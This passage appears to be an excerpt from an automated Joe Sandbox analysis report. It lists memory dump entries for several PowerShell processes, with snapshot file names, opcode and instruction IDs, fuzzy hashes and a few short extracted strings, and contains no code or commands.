                                                                                            • Instruction Fuzzy Hash: 5F31F63190CA588FDB29EFACD8556F9BBF0FF56311F04012ED08AD3682CB7568468B91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234757083.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd344d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ;t4
                                                                                            • API String ID: 0-1770406720
                                                                                            • Opcode ID: c977ecfbed0fdb194a123006bbbc7561494cd488e813089b45a2833e7313dad0
                                                                                            • Instruction ID: cf32685f9f8fa92927d25eed80631a2c3aa101eb3f0fe4eab9b1eaffd1c214e4
                                                                                            • Opcode Fuzzy Hash: c977ecfbed0fdb194a123006bbbc7561494cd488e813089b45a2833e7313dad0
                                                                                            • Instruction Fuzzy Hash: 2B110232B0E9890FE6A1E76CA0B55B8BBD1EF4232074A00B6D15CDB197DE6DAC008340
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234757083.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd344d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1de134973d058e3608fb065b799e296a2e91f4cb3227384d6209c5f747ca701
                                                                                            • Instruction ID: 32f5532ac11ff0565dcde244dbceb4d2c7f70841c8b1c97eb503d3cd37d4f09a
                                                                                            • Opcode Fuzzy Hash: c1de134973d058e3608fb065b799e296a2e91f4cb3227384d6209c5f747ca701
                                                                                            • Instruction Fuzzy Hash: CA515832B0EA960FE7A9DA5C64A5178B7D2EF9B221B1900BBC24DC7297DD1CEC058340
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: efe06a3131d1ca7e10752989dbfb88c025c50b58f090a19863764ec650230faf
                                                                                            • Instruction ID: abffe75cb2001db7060ee77653836fbc97e6e3580578ff83418ec59bc844f708
                                                                                            • Opcode Fuzzy Hash: efe06a3131d1ca7e10752989dbfb88c025c50b58f090a19863764ec650230faf
                                                                                            • Instruction Fuzzy Hash: 7F31E972A1CB489FDB589F5C98466A9BBE0FBA9310F00412FE449D3252DA74E855CBC2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e4a8afc1ef8bb0667297431a4e3584a88e3bef654bd2674753fd98fe83d54446
                                                                                            • Instruction ID: c253437e48125b9f802b1fb9882c67a69be4fc3a6946e89e07b91a8690799bdf
                                                                                            • Opcode Fuzzy Hash: e4a8afc1ef8bb0667297431a4e3584a88e3bef654bd2674753fd98fe83d54446
                                                                                            • Instruction Fuzzy Hash: 9F31063190CB4C4FDB59DFACD84A7E97BF0EBA6320F04416BD049D3156DA74A41ACB92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234757083.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd344d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a0fac42f0a8f74160e4f9ce345e48abfa0aeb5148a8b77820da6b9d87f774f26
                                                                                            • Instruction ID: 8d915474e8fca7470735aace855a7549ff154831f147075c5559ad1ae5b2ae08
                                                                                            • Opcode Fuzzy Hash: a0fac42f0a8f74160e4f9ce345e48abfa0aeb5148a8b77820da6b9d87f774f26
                                                                                            • Instruction Fuzzy Hash: E2210532B0EA970FE7A5DB5864B5138A6C2EF5B211B4A00BAD25DC71ABCD1CEC049300
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234757083.00007FFD344D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd344d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 00387e8e3b0ebafc412e8f2e4f369dc5750753f127b34f7cd1b02cf5ce7b6d51
                                                                                            • Instruction ID: 7cb9824be65944e4dc68716383149a2467755e5981410d035341273e6a743d75
                                                                                            • Opcode Fuzzy Hash: 00387e8e3b0ebafc412e8f2e4f369dc5750753f127b34f7cd1b02cf5ce7b6d51
                                                                                            • Instruction Fuzzy Hash: 30110672B0FA894FEBA1EA9880A45687BE2EF57310F0500BFD54DDB197D9686845C350
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2233994847.00007FFD342ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342ED000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd342ed000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                            • Instruction ID: a226bbc77e492e2d2cab390f7f5cceeb0ba974dfe887818e6e4082ad9372c7dd
                                                                                            • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                            • Instruction Fuzzy Hash: D2014F3160CE088F9BA4EF1EE48595237E0FB98320710069AD41DC755AD735F891CBC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                            • Instruction ID: 3306c9528c3651b4f0bbc2bd9bcccaf5aae1111e749d9882c440da8263015227
                                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                            • Instruction Fuzzy Hash: B701A73021CB0C4FD748EF4CE091AA5B7E0FB85320F10062DE58AC3651DA36E892CB41
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2411d49aff9c963e19a78f09db482460ef6301505b1b93e3acf6f94d8bc092be
                                                                                            • Instruction ID: a960d5b009d1f3ba4c9604108c1bcde348d77f93f35a1129ebe601d7d716a1f8
                                                                                            • Opcode Fuzzy Hash: 2411d49aff9c963e19a78f09db482460ef6301505b1b93e3acf6f94d8bc092be
                                                                                            • Instruction Fuzzy Hash: DDE0ED75904A4D8FDB44EF18D4554A9BBA0FB65201B01456EE409C7120D7759558CB82
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: K_^$K_^$K_^$K_^
                                                                                            • API String ID: 0-4267328068
                                                                                            • Opcode ID: 1d946ab97b089edc0a223e5bb3ce2b76c45bdeaa2a97b7a5ff01296199c8311a
                                                                                            • Instruction ID: 0b20d80ede7901d8edd5114ffbd1dd679f0ae62b6b601d2a3359bad827904a7d
                                                                                            • Opcode Fuzzy Hash: 1d946ab97b089edc0a223e5bb3ce2b76c45bdeaa2a97b7a5ff01296199c8311a
                                                                                            • Instruction Fuzzy Hash: 7241A0A3A0E6C21FE757572889B61D6BFA0EF13324B0E01F7C284CB487ED5D1417A642
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2234365690.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7ffd34400000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: K_^4$K_^7$K_^F$K_^J
                                                                                            • API String ID: 0-377281160
                                                                                            • Opcode ID: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                                            • Instruction ID: 1eb7d75e597954ccba82fa12fd3861bc3740c822279495172e41c573a8703b27
                                                                                            • Opcode Fuzzy Hash: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                                            • Instruction Fuzzy Hash: ED2187B770912A6ED7123BBCB8145EA3BB4CF9827535502B3D098DB003EC14B1CB8AC0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2333651167.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd344b0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8>o4
                                                                                            • API String ID: 0-4194255893
                                                                                            • Opcode ID: 8f123999aa2540e4797959d679c25a25abf81500eb25832ae45811cb3e14523a
                                                                                            • Instruction ID: b95c4a150f23d515df43e1c690831e88f7a075b6f17c18e978fd6c9961fb8a99
                                                                                            • Opcode Fuzzy Hash: 8f123999aa2540e4797959d679c25a25abf81500eb25832ae45811cb3e14523a
                                                                                            • Instruction Fuzzy Hash: B2515732F0CE960FE7A9DA5C64A517477D2EF92221B1900BBC28DC729BDD5DEC068341
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2333651167.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd344b0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8>o4
                                                                                            • API String ID: 0-4194255893
                                                                                            • Opcode ID: bf8d02fa90ad4f5ca9190c25eafabbdce2f754d4398acd4d3104bcc0c0e15778
                                                                                            • Instruction ID: 74b95c8fc3011fc3d49d5383302ddfad0950f1ccae530fd6ffc2011fe5dd55fd
                                                                                            • Opcode Fuzzy Hash: bf8d02fa90ad4f5ca9190c25eafabbdce2f754d4398acd4d3104bcc0c0e15778
                                                                                            • Instruction Fuzzy Hash: A721F233F0DA970FE7A5DB5C64B917466D2EF52211B4A00BAD28DC72ABCE9DEC059301
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2333651167.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd344b0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: p>o4
                                                                                            • API String ID: 0-2808034503
                                                                                            • Opcode ID: 63571b50165b52c463f10a4089ba01b8a3aa23e833620106e2a6ce1aed8b0cb7
                                                                                            • Instruction ID: d6ff988d9362fa4061a46bafee085b4c304d7de8415c6949b24306942ee84777
                                                                                            • Opcode Fuzzy Hash: 63571b50165b52c463f10a4089ba01b8a3aa23e833620106e2a6ce1aed8b0cb7
                                                                                            • Instruction Fuzzy Hash: 8F110232B0EA890FE6A1EB6C64A54B87BD1EF4231074A00B6D19CD7097DD9DAC108341
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2333651167.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd344b0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (Bo4
                                                                                            • API String ID: 0-4094526142
                                                                                            • Opcode ID: d586ffc6c724c6b40fa940818bfa91e5fd5f8de878864b727991c20524795b73
                                                                                            • Instruction ID: 17e24f5125574496d2951fc90c480223490bc13235612fc77e8403e32be929e3
                                                                                            • Opcode Fuzzy Hash: d586ffc6c724c6b40fa940818bfa91e5fd5f8de878864b727991c20524795b73
                                                                                            • Instruction Fuzzy Hash: 93113672B0EA884FEBA1DE9844A41687BE1EF16310F0500BFC6CDDB0A3DD68AC40C311
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2332615353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd343e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2eb95d225d8e92841b71588c9d99a980d7b06a168698027accb4469618410aa5
                                                                                            • Instruction ID: 039afb66849f9c3058460f4b3b0d3608884afb804a4b2120746c8aeae0120622
                                                                                            • Opcode Fuzzy Hash: 2eb95d225d8e92841b71588c9d99a980d7b06a168698027accb4469618410aa5
                                                                                            • Instruction Fuzzy Hash: A5410931A1DB888FDB199F5C9C4A6A97FE0FB56310F0441AFD489D3293DA74A845CBC2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2327750736.00007FFD342CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342CD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd342cd000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 96c3b969fe4860924f2090ed0c47daa6f5ff3d924bd9abce0cc841286a742c9d
                                                                                            • Instruction ID: f325d11635ed54ab1b7f9ae2f98dc9004a53d9ebb49f9d04cd2f2a72e9eeaac1
                                                                                            • Opcode Fuzzy Hash: 96c3b969fe4860924f2090ed0c47daa6f5ff3d924bd9abce0cc841286a742c9d
                                                                                            • Instruction Fuzzy Hash: 4841037180DBC48FE7569B2898919523FF0EF53220B1905EFD088CB1A3D629AC46C792
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2332615353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd343e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4a6c919d581cdefeca592a83364f96ae4dcd7102e07bb1973eabb03a67af2cf0
                                                                                            • Instruction ID: 1cbfbf7874e3ecc619573ceba717e743968dc5abc992e27a40c922d9d6c07eb6
                                                                                            • Opcode Fuzzy Hash: 4a6c919d581cdefeca592a83364f96ae4dcd7102e07bb1973eabb03a67af2cf0
                                                                                            • Instruction Fuzzy Hash: E321F83190CB4C8FDB59EBAC984A7E97FF0EB96321F04416FD049C3152DA74A856CB92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2332615353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd343e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                            • Instruction ID: 07153bfff212aaad96003ade6bf91a3dbe2d75e7666bf71565220f847edb9ce7
                                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                            • Instruction Fuzzy Hash: 3801677125CB0C4FD748EF4CE451AA6B7E0FB95364F10066DE58AC3651DA36E882CB46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2332615353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd343e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1989f70f39eae5eba778530b61089f706595a030d0f8c36b0ef8116e9401d837
                                                                                            • Instruction ID: b4c758873288e84313672f15d6260690cdd00a52a0e03da9b28eb33b9bd2bf96
                                                                                            • Opcode Fuzzy Hash: 1989f70f39eae5eba778530b61089f706595a030d0f8c36b0ef8116e9401d837
                                                                                            • Instruction Fuzzy Hash: 65F0FC37649A8C4FDB42EF2C98650E57FD0FF67315B0502B7D508C7151DA264848C782
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2332615353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_7ffd343e0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                                            • API String ID: 0-962139525
                                                                                            • Opcode ID: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                                                            • Instruction ID: 545cba7b2c0b5f45b998097f767a30dcb2b5499d62b8caa42f47cd49acb2aa8f
                                                                                            • Opcode Fuzzy Hash: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                                                            • Instruction Fuzzy Hash: 0921F273B045258AC31237ACB8519D97794DF5437A39A03F3E028DF193E929A4CB8A80
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2476642207.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (Bn4
                                                                                            • API String ID: 0-3977688063
                                                                                            • Opcode ID: 8eb04237c841061fc50f2d10c8547869e05405832ebf73bde496954e783df8d2
                                                                                            • Instruction ID: 6c939969a8a01000b84533a96eedad49fa4b7edd6981162025f4e40bf3d475dd
                                                                                            • Opcode Fuzzy Hash: 8eb04237c841061fc50f2d10c8547869e05405832ebf73bde496954e783df8d2
                                                                                            • Instruction Fuzzy Hash: E0110672B0FA894FEBA1DE9850A45B87BE1EF5A310F0500BFC58DDB197DD28A845C311
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7d14f4b168ca4926aacaf3fa661451cd51db53c7060d175d0368faae94ccd880
                                                                                            • Instruction ID: ad5d40eaea8e200b6a093e7e2ebfb55d91f09c3b51300899bd346905b09ebbc1
                                                                                            • Opcode Fuzzy Hash: 7d14f4b168ca4926aacaf3fa661451cd51db53c7060d175d0368faae94ccd880
                                                                                            • Instruction Fuzzy Hash: B0F0E931509A8C8FCB45EF2C94651A87FF0FF2A200B0401E7E84DC7061DA369D14C781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 92aaaecda559d9a505af4042ca1b1846694bcac74fb480ea78896ea1e7872cf2
                                                                                            • Instruction ID: 206782d81fd88af2ab3962387340e92e93a68a50a26a4f5b26f8edd8d618e2d8
                                                                                            • Opcode Fuzzy Hash: 92aaaecda559d9a505af4042ca1b1846694bcac74fb480ea78896ea1e7872cf2
                                                                                            • Instruction Fuzzy Hash: FF413D31A0DB884FDB08AB5C984A6B9BBE0FB55310F14416FE449D3292DA34B855CBC2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2474877195.00007FFD342BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd342bd000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d72d1f1346504198c08d4af62f351b7752e5277f7874800ef9cf445bcfb950f0
                                                                                            • Instruction ID: 1b85e45f77ca423e5588e50e300c46d4fa5794608aa802fb745bd3a122956723
                                                                                            • Opcode Fuzzy Hash: d72d1f1346504198c08d4af62f351b7752e5277f7874800ef9cf445bcfb950f0
                                                                                            • Instruction Fuzzy Hash: 5441297140DBC44FD75B9B3998559523FF0EF53320B1905DFD088CB1A3DA6AA846C7A2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7be0dceff490aad6fb6f60a6dfe766785a6b7776e8a663cebf37736c921f3525
                                                                                            • Instruction ID: 910e7534074bdd72a30f6330b7b871dc72a5afd30df0fb0fbfd3492bc1df53d2
                                                                                            • Opcode Fuzzy Hash: 7be0dceff490aad6fb6f60a6dfe766785a6b7776e8a663cebf37736c921f3525
                                                                                            • Instruction Fuzzy Hash: 1F31083190C7488FDB59DF5C98496B97BF0EB67320F04416FD449C7162D674A84ACB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction ID: 36244d86933e0c8f26a47dd4d49cb58ef4198a5314763e2dd3cfdd5a3badc4b9
                                                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction Fuzzy Hash: 5001677125CB0C4FD748EF4CE451AA5B7E0FB95364F10066DE58AC3651DA36E882CB46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2476642207.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8b16e96691e6b9fd6b3c6e010f46d332a63262ccbacafdb2254b3d1dff21d6d5
                                                                                            • Instruction ID: ea181ce2ac9a7b4e56b9179bb36fc770b355a82f9f5efa9a85a9274cddf1c445
                                                                                            • Opcode Fuzzy Hash: 8b16e96691e6b9fd6b3c6e010f46d332a63262ccbacafdb2254b3d1dff21d6d5
                                                                                            • Instruction Fuzzy Hash: 71F0BE32B0D5148FDBA8EB8CF4A84A877E5EF5632171600BAE15DC7167DA2AEC40C740
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2476642207.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ebf203ff7e46d37984dc3f014a37674e0a82800bbf86f493c519be4e455e16ee
                                                                                            • Instruction ID: 0914a620f53d3b6d39335e0686997315d9a106b367ddd1725a762437a1ccf057
                                                                                            • Opcode Fuzzy Hash: ebf203ff7e46d37984dc3f014a37674e0a82800bbf86f493c519be4e455e16ee
                                                                                            • Instruction Fuzzy Hash: FCF05E32A0D5448FEBA4EB4CE4A14E877E0EF4632475600B6E15DCB467DA2AAC40C750
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2476642207.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                            • Instruction ID: 041fe14c17ebd3973d1da0dec6e22d30a4cad49f73de8dda0137f5f9e64c194f
                                                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                            • Instruction Fuzzy Hash: 3EE0123170C4148FD7A8DA0CF0989AD73E1EB9933171101B7D24EC7565C625EC519B80
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                                            • API String ID: 0-4116931533
                                                                                            • Opcode ID: 4488404bc8ae31a008ec9fb42eb0aec430a88785829394b4aa67b8cb2f0cfac0
                                                                                            • Instruction ID: e28c0f620ce0d449d45828b8f7b0426ca146e1db533790180f55d9c927756db4
                                                                                            • Opcode Fuzzy Hash: 4488404bc8ae31a008ec9fb42eb0aec430a88785829394b4aa67b8cb2f0cfac0
                                                                                            • Instruction Fuzzy Hash: 622100777094265FD31277EDBC205D97798DBA42B674802B3D358DB603D92560CB87C1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.2475706973.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: N_^$N_^$N_^$N_^
                                                                                            • API String ID: 0-3900292545
                                                                                            • Opcode ID: f505ddfec79cf9bcf986afda262a55539c439bfe1e1a9d98730fba716cdb680f
                                                                                            • Instruction ID: 70f56966053ca2ec4c03c263c8feb5aeb13dee1644b4b4ee2097f9d8b33ff552
                                                                                            • Opcode Fuzzy Hash: f505ddfec79cf9bcf986afda262a55539c439bfe1e1a9d98730fba716cdb680f
                                                                                            • Instruction Fuzzy Hash: 3A4162A6A0F6C25FE30B57284CA50557FA1FF53318F4A05F6C294CF0A3EA2969068752
                                                                                            Strings
                                                                                            Memory Dump Source
